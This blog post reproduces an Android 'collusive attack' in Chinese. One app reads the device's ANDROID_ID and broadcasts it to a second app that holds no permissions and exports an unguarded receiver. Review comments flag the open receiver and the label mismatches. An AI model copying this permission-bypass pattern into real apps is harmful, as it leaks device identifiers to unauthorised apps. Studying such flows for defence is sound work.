Collusive_Attack复现

引入

Collusive_Attack 复现,即合谋攻击复现。简单来讲:appA 持有权限并获取相关敏感信息,appB 自身不申请该权限,只负责接收或转发 appA 传来的敏感信息。这样权限检查只约束了 appA,数据却流向了未被授权的 appB。

参考代码

有权app

androidmanifest.xml

<!-- The only permission the sender app requests. The MainActivity.kt listing on this page
     reads Settings.Secure.ANDROID_ID, which needs no permission, so this declaration is not
     exercised by the demo as written.
     NOTE(review): on Android 10 and later, third-party apps generally cannot read the IMEI
     with READ_PHONE_STATE alone; confirm against the target API level. -->
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>

main_activity.xml

<?xml version="1.0" encoding="utf-8"?>

<!-- Sender app UI: a single centred button.
     The Kotlin code loads this layout as R.layout.activity_main, so the file is presumably
     res/layout/activity_main.xml rather than main_activity.xml; verify in the project. -->
<LinearLayout
xmlns:android="http://schemas.android.com/apk/res/android"
android:orientation="vertical"
android:gravity="center"
android:layout_width="match_parent"
android:layout_height="match_parent">

<!-- The label says "read IMEI and send", but the click handler in MainActivity.kt sends
     Settings.Secure.ANDROID_ID under the extra key "imei". -->
<Button
android:id="@+id/btnSend"
android:text="读取IMEI并发送"
android:layout_width="wrap_content"
android:layout_height="wrap_content"/>

</LinearLayout>

MainActivity.kt

package com.example.mobile_demo2

import android.content.ComponentName
import android.content.Intent
import android.os.Bundle
import android.provider.Settings
import android.widget.Button
import androidx.appcompat.app.AppCompatActivity

/**
 * Sender side of the two-app demo.
 *
 * Tapping the button reads a device identifier and pushes it to a fixed component in another
 * package through an explicit broadcast. Nothing in this class checks who owns that package
 * or attaches a receiver permission to the broadcast, which is the data-flow a reviewer
 * should look for: an identifier obtained by this app leaves it via plain IPC.
 *
 * The value sent is `Settings.Secure.ANDROID_ID`, not an IMEI, although the extra key is
 * still named "imei". On Android 8.0 and later ANDROID_ID is scoped per app signing key,
 * user and device, so the receiving app obtains this app's scoped value.
 */
class MainActivity : AppCompatActivity() {

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)

        findViewById<Button>(R.id.btnSend).setOnClickListener {
            // Use ANDROID_ID in place of the IMEI.
            val androidId = Settings.Secure.getString(contentResolver, Settings.Secure.ANDROID_ID)

            // Explicit target: only this component in the receiving app gets the broadcast.
            val target = ComponentName(
                "com.example.mobile_demo3",
                "com.example.mobile_demo3.MyReceiver",
            )

            sendBroadcast(
                Intent().apply {
                    putExtra("imei", androidId)
                    component = target
                },
            )
        }
    }
}

接收app

androidmanifest.xml

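<?xml version="1.0" encoding="utf-8"?>
<!--
  Manifest of the receiving app (package com.example.mobile_demo3 in the Kotlin listings).
  It declares no <uses-permission>: the identifier it displays arrives from the sender app
  over the broadcast receiver below, not through any permission of its own.
-->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools">

    <application
        android:allowBackup="true"
        android:dataExtractionRules="@xml/data_extraction_rules"
        android:fullBackupContent="@xml/backup_rules"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true"
        android:theme="@style/Theme.Mobile_demo3"
        tools:targetApi="31">

        <!-- Launcher activity that hosts the TextView updated by MyReceiver. -->
        <activity
            android:name=".MainActivity"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <!--
          Receives the broadcast. MyReceiver extends BroadcastReceiver, so it is declared
          only as a <receiver>; listing it as an <activity> as well is invalid and only
          passes lint when the Instantiatable check is suppressed.

          NOTE(review): exported="true" with no android:permission means any installed app
          can deliver an intent to this component. The demo depends on that. Outside a lab
          setup, guard such a receiver with a signature-level permission or keep it
          non-exported.
        -->
        <receiver
            android:name=".MyReceiver"
            android:exported="true" />
    </application>

</manifest>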

main_activity.xml

<?xml version="1.0" encoding="utf-8"?>

<!-- Receiver app UI: a single centred text field.
     The Kotlin code loads this layout as R.layout.activity_main, so the file is presumably
     res/layout/activity_main.xml rather than main_activity.xml; verify in the project. -->
<LinearLayout
xmlns:android="http://schemas.android.com/apk/res/android"
android:orientation="vertical"
android:gravity="center"
android:layout_width="match_parent"
android:layout_height="match_parent">

<!-- Starts with a "waiting for data" placeholder; MyReceiver overwrites the text through
     MainActivity.textView when a broadcast carrying the "imei" extra arrives. -->
<TextView
android:id="@+id/txtData"
android:text="等待数据..."
android:textSize="22sp"
android:layout_width="wrap_content"
android:layout_height="wrap_content"/>

</LinearLayout>

Main_Activity.kt

package com.example.mobile_demo3

import android.os.Bundle
import android.widget.TextView
import androidx.appcompat.app.AppCompatActivity

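/**
 * Launcher activity of the receiving app.
 *
 * It publishes its `txtData` view through the companion-object field [textView] so that
 * [MyReceiver] can write the received value into the UI. A view held in a static field keeps
 * its activity reachable after the activity is destroyed, so the reference is dropped again
 * in [onDestroy]. While no activity instance is alive, [textView] is null and the receiver's
 * update is a no-op.
 */
class MainActivity : AppCompatActivity() {

    // The view this instance published; lets onDestroy clear only its own reference and not
    // one that a newer instance has already stored in the companion object.
    private var publishedView: TextView? = null

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)

        publishedView = findViewById<TextView>(R.id.txtData)
        textView = publishedView
    }

    override fun onDestroy() {
        // Release the static reference so the destroyed activity and its view tree can be
        // garbage-collected and the receiver never writes to a stale view.
        if (textView === publishedView) {
            textView = null
        }
        publishedView = null
        super.onDestroy()
    }

    companion object {
        // Shared with MyReceiver; null whenever no MainActivity instance is showing.
        var textView: TextView? = null
    }
}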

MyReceiver.kt

package com.example.mobile_demo3

import android.content.BroadcastReceiver
import android.content.Context
import android.content.Intent

/**
 * Receiving end of the demo: takes the "imei" string extra from an incoming broadcast and
 * shows it in the activity's text view.
 *
 * The receiver does not inspect where the intent came from, and the manifest on this page
 * exports it without an `android:permission`, so the displayed value is whatever the sending
 * app chose to put in the extra. The value is rendered as-is; a missing extra shows up as
 * the text "null".
 */
class MyReceiver : BroadcastReceiver() {

    override fun onReceive(context: Context?, intent: Intent?) {
        val received: String? = intent?.getStringExtra("imei")

        // No-op when MainActivity has not published a view.
        MainActivity.textView?.let { it.text = "收到IMEI: $received" }
    }
}

Collusive_Attack复现
https://alenirving.github.io/2026/03/14/Collusive_Attack复现/
作者
Ma5k
许可协议
CC-BY-NC-SA